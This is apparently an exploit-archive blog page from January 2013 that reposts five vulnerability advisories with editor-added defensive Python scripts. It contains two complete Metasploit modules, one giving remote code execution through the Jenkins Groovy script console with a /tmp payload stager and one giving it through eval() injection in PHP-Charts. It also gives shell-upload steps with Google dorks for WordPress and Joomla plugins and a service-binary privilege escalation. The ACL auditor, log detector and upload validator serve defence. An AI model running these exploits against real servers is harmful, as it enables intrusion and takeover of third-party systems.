Archive for 22 January 2013

WordPress File Uploader Plugin PHP File Upload Vulnerability

The never-ending stream of PHP file upload vulnerabilities in WordPress and Joomla continues to be found at full speed.
Once again a WordPress plugin is affected, this time the File Uploader plugin; the vulnerability and how it is used are as follows:

# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux
 
Vulnerable Code: (process-form.php)
 
97: $filepart = fileinformation( $_FILES['postimage']['name'] );
98: $filename = $filepart['basename'];
99: // check if this filename already exist in the folder
100: $i = 2;
101: while ( in_array( $filename, $imageslist ) ) {
102: $filename = $filepart['filename'] . '_' . $i++ . '.' .$filepart['extension'];
103: }
104:  move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);
 
Description:
 
The plugin simply uploads the attachment with its original name and extension to "wp-content/uploads/".
An attacker can upload PHP files and access them remotely.
 
Proof of Concept:
 
1. Visit vulnerable target and navigate to the "File Uploader" site.
2. Upload a file named shell.php
3. Access it with the browser on example.com/wp-content/uploads/shell.php
 
Done!
 
Proof Video: http://goo.gl/ogbsA

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

For the Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation vulnerability, how the flaw arises and how it is used locally are as follows:

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability


Vendor: Aloaha Software - Wrocklage Intermedia GmbH
Product web page: http://www.aloaha.com
Affected version: 5.0.226

Summary: Aloaha Credential Provider represents one of the most dramatic changes
in the Windows Vista / 7 logon screen, making it much easier to implement new user
authentication scenarios that are supported by the OS. Logging on to a Windows
machine via smartcard usually requires the machine to be a member of a domain.
With the Aloaha Credential Provider that is not required; the logon screen
is the first thing users see when they turn on the computer.

Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of
privileges vulnerability which can be used by a simple user that can change the
executable file with a binary of choice. The vulnerability exists due to the
improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the
'AloahaCredentialProviderService.exe' binary file. The service was shipped with
Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The
files are installed in the 'Wrocklage' directory which has the Everyone group
assigned to it with full permissions, making every single file inside vulnerable
to change by any user on the affected machine. After you replace the binary with
your rootkit, on reboot you get SYSTEM privileges.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (@zeroscience)


Advisory ID: ZSL-2013-5124
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php


19.01.2013


---------------------------------------------------------------------------------

C:\Program Files\Wrocklage>sc qc AloahaCPM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe
C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R


C:\Program Files\Wrocklage>

---------------------------------------------------------------------------------
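The two commands quoted above are exactly what a defender needs to audit for this class of bug: `sc qc` tells you which binary a service runs and under which account, and `cacls` tells you who may write to that binary. The following script is an added example by the editor, not part of the ZSL advisory; it parses that output and reports any low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) holding Full, Change or Write access on a service binary, and marks the finding as a privilege escalation when the service runs as LocalSystem. The sample input is the advisory's own output embedded as a string; the trustee and permission sets are the editor's choices.

```python
import re

# Sample input: the `sc qc` and `cacls` output quoted in the advisory above.
SC_QC_OUTPUT = r"""
SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

CACLS_OUTPUT = r"""
C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R
"""

# Principals that every ordinary interactive user is a member of (editor's list).
LOW_PRIV_TRUSTEES = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}
# Service accounts for which a replaced binary means SYSTEM-level code execution.
PRIVILEGED_ACCOUNTS = {"localsystem", r"nt authority\system"}
# cacls permission letters that allow modifying the file: Full, Change, Write.
WRITE_PERMS = {"F", "C", "W"}
# One cacls ACE: "<trustee>:(flags)<perm>", flags such as (ID), (OI), (CI) optional.
ACE_RE = re.compile(r"^\s*(?P<trustee>.+?):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[FCRWN])\s*$")


def parse_sc_qc(output):
    """Extract service name, executable path and start account from `sc qc` output."""
    cfg = {}
    for line in output.splitlines():
        m = re.match(r"\s*(\w+)\s*:\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "BINARY_PATH_NAME":
            quoted = re.match(r'"([^"]+)"', value)
            if quoted:
                cfg["binary"] = quoted.group(1)
            else:
                # Unquoted path: keep everything up to the executable, drop arguments.
                exe = re.match(r"(.*?\.exe)", value, re.IGNORECASE)
                cfg["binary"] = exe.group(1) if exe else value
        elif key == "SERVICE_START_NAME":
            cfg["account"] = value
        elif key == "SERVICE_NAME":
            cfg["name"] = value
    return cfg


def parse_cacls(output, path):
    """Return [(trustee, perm, inherited)] from `cacls <path>` output.
    cacls prints the file path in front of the first ACE only, so strip it."""
    aces = []
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("trustee"), m.group("perm"), "(ID)" in m.group("flags")))
    return aces


def assess_service(sc_output, cacls_output):
    """Report low-privileged principals that can replace the service binary."""
    cfg = parse_sc_qc(sc_output)
    account = cfg.get("account", "")
    findings = []
    for trustee, perm, _inherited in parse_cacls(cacls_output, cfg["binary"]):
        if trustee.lower() in LOW_PRIV_TRUSTEES and perm in WRITE_PERMS:
            findings.append({
                "service": cfg.get("name"),
                "binary": cfg["binary"],
                "trustee": trustee,
                "perm": perm,
                "runs_as": account,
                # Whoever can swap the binary gets the service account's privileges.
                "privilege_escalation": account.lower() in PRIVILEGED_ACCOUNTS,
            })
    return findings


if __name__ == "__main__":
    for f in assess_service(SC_QC_OUTPUT, CACLS_OUTPUT):
        print(f)
```

On a real host, feed the script the output of `sc qc <service>` and `cacls <binary>` for every service; the fix on the Aloaha side is to remove the Everyone ACE from the Wrocklage directory and its files so that only Administrators and SYSTEM can write there.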

Jenkins Script-Console Java Execution

The Metasploit exploit for the Jenkins Script-Console Java Execution vulnerability is as follows.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Jenkins Script-Console Java Execution',
			'Description'    => %q{
					This module uses the Jenkins Groovy script console to execute
				OS commands using Java.
			},
			'Author'	=>
				[
					'Spencer McIntyre',
					'jamcut'
				],
			'License'        => MSF_LICENSE,
			'DefaultOptions' =>
				{
					'WfsDelay' => '10',
				},
			'References'     =>
				[
					['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
				],
			'Targets'		=>
				[
					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
				],
			'DisclosureDate' => 'Jan 18 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
			], self.class)
	end

	def check
		uri = target_uri
		uri.path = normalize_uri(uri.path)
		uri.path << "/" if uri.path[-1, 1] != "/"
		res = send_request_cgi({'uri' => "#{uri.path}login"})
		if res and res.headers.include?('X-Jenkins')
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def on_new_session(client)
		if not @to_delete.nil?
			print_warning("Deleting #{@to_delete} payload file")
			execute_command("rm #{@to_delete}")
		end
	end

	def http_send_command(cmd, opts = {})
		request_parameters = {
			'method'    => 'POST',
			'uri'       => "#{@uri.path}script",
			'vars_post' =>
				{
					'script' => java_craft_runtime_exec(cmd),
					'Submit' => 'Run'
				}
		}
		request_parameters['cookie'] = @cookie if @cookie != nil
		res = send_request_cgi(request_parameters)
		if not (res and res.code == 200)
			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
		end
	end

	def java_craft_runtime_exec(cmd)
		decoder = Rex::Text.rand_text_alpha(5, 8)
		decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
		cmd_array = Rex::Text.rand_text_alpha(5, 8)
		jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
		jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"

		jcode << "String [] #{cmd_array} = new String[3];\n"
		if target['Platform'] == 'win'
			jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
			jcode << "#{cmd_array}[1] = \"/c\";\n"
		else
			jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
			jcode << "#{cmd_array}[1] = \"-c\";\n"
		end
		jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
		jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
		jcode
	end

	def execute_command(cmd, opts = {})
		vprint_status("Attempting to execute: #{cmd}")
		http_send_command("#{cmd}")
	end

	def linux_stager
		cmds = "echo LINE | tee FILE"
		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
		base64 = Rex::Text.encode_base64(exe)
		base64.gsub!(/\=/, "\\u003d")
		file = rand_text_alphanumeric(4+rand(4))

		execute_command("touch /tmp/#{file}.b64")
		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
		base64.each_line do |line|
			line.chomp!
			cmd = cmds
			cmd.gsub!(/LINE/, line)
			execute_command(cmds)
		end

		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
		execute_command("chmod +x /tmp/#{file}")
		execute_command("rm /tmp/#{file}.b64")

		execute_command("/tmp/#{file}")
		@to_delete = "/tmp/#{file}"
	end


	def exploit
		@uri = target_uri
		@uri.path = normalize_uri(@uri.path)
		@uri.path << "/" if @uri.path[-1, 1] != "/"
		print_status('Checking access to the script console')
		res = send_request_cgi({'uri' => "#{@uri.path}script"})
		fail_with(Exploit::Failure::Unknown) if not res

		@cookie = nil
		if res.code != 200
			print_status('Logging in...')
			res = send_request_cgi({
				'method'    => 'POST',
				'uri'       => "#{@uri.path}j_acegi_security_check",
				'vars_post' =>
					{
						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
						'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
						'Submit'     => 'log in'
					}
			})

			if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
				fail_with(Exploit::Failure::NoAccess, 'login failed')
			end
			sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
			@cookie = "#{sessionid}"
		else
			print_status('No authentication required, skipping login...')
		end

		case target['Platform']
		when 'win'
			print_status("#{rhost}:#{rport} - Sending VBS stager...")
			execute_cmdstager({:linemax => 2049})
		when 'unix'
			print_status("#{rhost}:#{rport} - Sending payload...")
			http_send_command("#{payload.encoded}")
		when 'linux'
			print_status("#{rhost}:#{rport} - Sending Linux stager...")
			linux_stager
		end

		handler
	end
end
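The module above leaves a very recognisable trace in the web server or reverse proxy in front of Jenkins: a GET to `<base>/script` (open consoles answer 200 to anonymous clients, which is the "No authentication required" branch), optionally a POST to `<base>/j_acegi_security_check` answered with a 302, and then one POST to `<base>/script` per command executed. The script below is an added example by the editor, not part of the Metasploit module; it parses combined-format access log lines and reports both patterns. The log lines are constructed for the example; `/scriptText` is included because it is the text-only variant of the same Jenkins console.

```python
import re
from collections import defaultdict

# Combined log format: client, ident, user, [time], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Groovy console endpoints; the module POSTs its script to ".../script".
CONSOLE_RE = re.compile(r"/(script|scriptText)(\?.*)?$")
# Form login endpoint the module uses when the console is not open to anonymous users.
LOGIN_RE = re.compile(r"/j_acegi_security_check(\?.*)?$")

# Constructed sample log (not from any real Jenkins instance).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2013:10:01:02 +0000] "GET /jenkins/login HTTP/1.1" 200 3120
10.0.0.5 - - [22/Jan/2013:10:01:03 +0000] "GET /jenkins/script HTTP/1.1" 403 1201
10.0.0.5 - - [22/Jan/2013:10:01:04 +0000] "POST /jenkins/j_acegi_security_check HTTP/1.1" 302 0
10.0.0.5 - - [22/Jan/2013:10:01:05 +0000] "POST /jenkins/script HTTP/1.1" 200 2210
10.0.0.5 - - [22/Jan/2013:10:01:06 +0000] "POST /jenkins/script HTTP/1.1" 200 2210
10.0.0.7 - - [22/Jan/2013:10:03:00 +0000] "GET /jenkins/script HTTP/1.1" 200 4100
10.0.0.9 - admin [22/Jan/2013:10:05:00 +0000] "GET /jenkins/job/build/ HTTP/1.1" 200 8800
10.0.0.9 - admin [22/Jan/2013:10:05:01 +0000] "GET /jenkins/script HTTP/1.1" 200 4100
"""


def parse_log(text):
    """Yield one dict per parseable combined-format line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def console_script_posts(text):
    """Per client: number of POSTs to the script console (each one executes a
    Groovy script) and whether that client first logged in through the form.
    Returns a sorted list of (ip, post_count, logged_in_via_form)."""
    posts = defaultdict(int)
    logged_in = defaultdict(bool)
    for e in parse_log(text):
        if e["method"] == "POST" and LOGIN_RE.search(e["path"]) and e["status"] == "302":
            logged_in[e["ip"]] = True
        elif e["method"] == "POST" and CONSOLE_RE.search(e["path"]):
            posts[e["ip"]] += 1
    return sorted((ip, n, logged_in[ip]) for ip, n in posts.items())


def anonymous_console_access(text):
    """Clients that fetched the console page with no authenticated user and got
    200: the console is reachable without credentials at all."""
    hits = set()
    for e in parse_log(text):
        if (e["method"] == "GET" and CONSOLE_RE.search(e["path"])
                and e["status"] == "200" and e["user"] == "-"):
            hits.add(e["ip"])
    return sorted(hits)


if __name__ == "__main__":
    print("script POSTs:", console_script_posts(SAMPLE_LOG))
    print("anonymous console access:", anonymous_console_access(SAMPLE_LOG))
```

The user field in an access log only reflects HTTP basic authentication; a client that logged in through the form keeps sending "-", so correlate the console POSTs with Jenkins' own security realm logs to attribute them. Any POST to the console from an address that is not a known administrator workstation deserves a ticket, and a 200 on GET /script for an anonymous client means the instance's authorization strategy allows everyone to run Groovy as the Jenkins user.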

PHP-Charts v1.0 PHP Code Execution Vulnerability

The exploit for the PHP-Charts v1.0 PHP Code Execution vulnerability and information on how the vulnerability is used are below.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
			'Description'    => %q{
				This module exploits a PHP code execution vulnerability in php-Charts
				version 1.0 which could be abused to allow users to execute arbitrary
				PHP code under the context of the webserver user. The 'url.php' script
				calls eval() with user controlled data from any HTTP GET parameter name.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'AkaStep', # Discovery and PoC
					'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
				],
			'References'     =>
				[
					['OSVDB', '89334'],
					['BID', '57448'],
					['EDB',   '24201']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x0a\x0d\x22",
					'Compat'      =>
						{
						'PayloadType' => 'cmd',
						'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
						}
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Automatic Targeting', { 'auto' => true }]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jan 16 2013",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']),
			], self.class)
	end

	def check

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		peer  = "#{rhost}:#{rport}"
		fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
		code  = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}"))
		rand_key_value = rand_text_alphanumeric(rand(10)+6)

		# send check
		print_status("#{peer} - Sending check")
		begin
			res = send_request_cgi({
				'method' => 'GET',
				'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
			})

			if res and res.body =~ /#{fingerprint}/
				return Exploit::CheckCode::Vulnerable
			else
				return Exploit::CheckCode::Safe
			end
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("#{peer} - Connection failed")
		end
		return Exploit::CheckCode::Unknown

	end

	def exploit

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		@peer = "#{rhost}:#{rport}"
		code  = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
		rand_key_value = rand_text_alphanumeric(rand(10)+6)

		# send payload
		print_status("#{@peer} - Sending payload (#{code.length} bytes)")
		begin
			res = send_request_cgi({
				'method' => 'GET',
				'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
			})
			if res and res.code == 500
				print_good("#{@peer} - Payload sent successfully")
			else
				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
			end
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
				fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end

	end
end
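What makes this module unusual is where the payload lives: not in a parameter value but in the parameter *name*, because `url.php` passes GET parameter names to eval(). A request that carries `${system(base64_decode("..."))}` as a key is therefore easy to recognise at the proxy or in logs, and a correct `url.php` would only ever accept names from an allowlist. The following script is an added example by the editor, not part of the Metasploit module; it extracts the parameter names of a URL the way PHP does (split on `&` and `=`, then percent-decode), flags any name that is not a plain identifier, and decodes the base64 argument so an analyst can see the command without running anything. The sample URLs and the benign parameter names are constructed for the example.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl, quote

# A legitimate parameter name: identifier characters, optional array brackets.
SAFE_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\[[^\]]*\])*$")
# Substrings that mark a name as PHP code rather than data.
CODE_MARKERS = ("${", "$(", "(", "eval", "system", "base64_decode", "`")
# The base64_decode("...") argument used by the module's check and exploit methods.
B64_ARG_RE = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')

# Constructed sample requests. The malicious one mirrors the URI the module builds:
# the command is base64-encoded and percent-encoded, and the value is random filler.
SAMPLE_B64 = base64.b64encode(b"echo deadbeef").decode()
MALICIOUS_URL = ("http://example.com/php-charts_v1.0/wizard/url.php?"
                 '${system(base64_decode("' + quote(SAMPLE_B64, safe="") + '"))}=qZx7Kd')
BENIGN_URL = "http://example.com/php-charts_v1.0/wizard/url.php?type=line&title=Sales&w=400"


def query_names(url):
    """Parameter names as PHP would see them in $_GET: split first, decode after."""
    query = urlsplit(url).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)]


def inspect_request(url):
    """Return a finding for every parameter name that looks like code.
    Each finding has the raw name, the code markers seen, and the decoded
    command when the name wraps a base64_decode("...") call."""
    findings = []
    for name in query_names(url):
        if SAFE_NAME_RE.match(name):
            continue
        markers = [m for m in CODE_MARKERS if m in name]
        decoded = None
        b64 = B64_ARG_RE.search(name)
        if b64:
            try:
                decoded = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
            except ValueError:
                decoded = None
        findings.append({"name": name, "markers": markers, "decoded": decoded})
    return findings


def allowed_params(url, allowed):
    """What a hardened url.php should do instead of eval(): keep only known names.
    `allowed` is the application's own list of expected parameters."""
    return {name: value for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if name in allowed}


if __name__ == "__main__":
    for f in inspect_request(MALICIOUS_URL):
        print(f)
    print(allowed_params(BENIGN_URL, {"type", "title", "w"}))
```

The decoded command is shown for triage only; the detection itself needs nothing more than the identifier check, which also catches variations that do not use base64 at all. Whatever the chart code needs from the query string, the fix is the same as `allowed_params`: look names up in a fixed list and never hand them to eval().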

Joomla com_collector Component Arbitrary File Upload Vulnerability

A Joomla com_collector Component Arbitrary File Upload vulnerability has been found; where the vulnerability lies and how it is used are as follows.

# Exploit Title: Joomla com_collector shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home: HackForums.AL, alb0zz.in
# Date: 19/01/2013

# Category: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP

# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
#      ~ Expl0itation ~      #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]

2- Add this part to the site: /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

3- It will look like this: http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Upload your shell as: shell.php


# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.

#2013
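The WordPress File Uploader advisory at the top of this page and this Joomla com_collector advisory describe the same defect: the handler takes the client-supplied filename, keeps its extension, and writes it into a web-served directory, so a `.php` upload becomes executable code. The vulnerable `process-form.php` lines even loop to avoid name collisions (`name_2.ext`, `name_3.ext`, ...) while never asking whether the extension is acceptable. The following validator is an added example by the editor, not code from either plugin; it shows the checks both lack: reduce the name to its final path component, reject NUL bytes, refuse any executable extension in any position (so `shell.php.jpg` fails too), allow only an explicit list of image types, confirm the first bytes match that type, and then store the file under a server-generated name so the client's name never reaches the disk. The allowlist and executable-extension set are the editor's choices for the example.

```python
import os
import secrets

# Allowed image types: extension -> magic-byte prefixes a genuine file starts with.
# Constructed allowlist for this example; a plugin would set its own.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# Extensions a typical PHP web server will execute; refused whatever the bytes say.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}


def validate_upload(client_name, head):
    """Return (ok, reason, extension). `client_name` is the untrusted
    $_FILES[...]['name']; `head` is the first bytes of the uploaded file."""
    # Only the final path component matters; the client controls the whole string.
    name = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in name:
        return False, "NUL byte in filename", None
    parts = name.lower().split(".")
    # Also rejects dot-files such as .htaccess, which have an empty base name.
    if len(parts) < 2 or not parts[0]:
        return False, "no extension", None
    exts = parts[1:]
    # Every extension segment is checked, so shell.php.jpg is refused as well.
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, "executable extension", None
    ext = exts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed", None
    if not any(head.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension", None
    return True, "ok", ext


def storage_name(ext):
    """Server-chosen name for the stored file. Because the client's name is never
    used on disk, the collision loop in the vulnerable code is unnecessary."""
    return f"{secrets.token_hex(16)}.{ext}"


def handle_upload(client_name, head):
    """Combine both steps the way an upload handler would: validate, then name."""
    ok, reason, ext = validate_upload(client_name, head)
    if not ok:
        return None, reason
    return storage_name(ext), "stored"


if __name__ == "__main__":
    for name, head in [("shell.php", b"<?php system($_GET['c']); ?>"),
                       ("photo.JPG", b"\xff\xd8\xff\xe0JFIF"),
                       ("shell.php.jpg", b"\xff\xd8\xff\xe0")]:
        print(name, "->", handle_upload(name, head))
```

Inside WordPress the same result is available without hand-written code: `wp_handle_upload()` runs the filename and MIME checks against the site's allowed types and `sanitize_file_name()` strips path and control characters, so a plugin that calls `move_uploaded_file()` directly on `$_FILES` has bypassed the protection the platform already provides. For any directory that must accept uploads, also make sure the web server does not execute scripts from it, so that a single missed extension does not become remote code execution.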